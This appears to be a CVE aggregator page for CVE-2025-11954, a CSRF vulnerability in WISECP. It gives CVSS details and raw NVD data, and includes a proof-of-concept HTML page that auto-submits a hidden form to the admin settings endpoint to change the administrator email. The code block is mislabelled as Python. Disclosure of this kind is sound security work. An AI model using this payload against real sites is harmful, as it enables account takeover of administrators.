Security Vulnerability Report
中文
CVE-2025-11954 CVSS 8.0 HIGH

CVE-2025-11954

Published: 2026-05-20 13:16:14
Last Modified: 2026-05-20 14:04:19

Description

Cross-Site request forgery (CSRF) vulnerability in Sitemio Information Technologies Trade Ltd. Co. WISECP allows Cross Site Request Forgery. This issue affects WISECP: through 20022026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
8.0
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WISECP <= 20022026

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<html> <!-- PoC for CVE-2025-11954 WISECP CSRF --> <body> <h2>You are being redirected...</h2> <!-- Malicious form targeting WISECP admin interface --> <form action="http://target-wisecp-domain.com/admin.php" method="POST"> <input type="hidden" name="module" value="settings" /> <input type="hidden" name="action" value="save" /> <input type="hidden" name="admin_email" value="[email protected]" /> <input type="hidden" name="notify_email" value="1" /> </form> <script> // Automatically submit the form when user visits the page document.forms[0].submit(); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11954", "sourceIdentifier": "[email protected]", "published": "2026-05-20T13:16:14.153", "lastModified": "2026-05-20T14:04:18.950", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site request forgery (CSRF) vulnerability in Sitemio Information Technologies Trade Ltd. Co. WISECP allows Cross Site Request Forgery.\n\nThis issue affects WISECP: through 20022026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0262", "source": "[email protected]"}]}}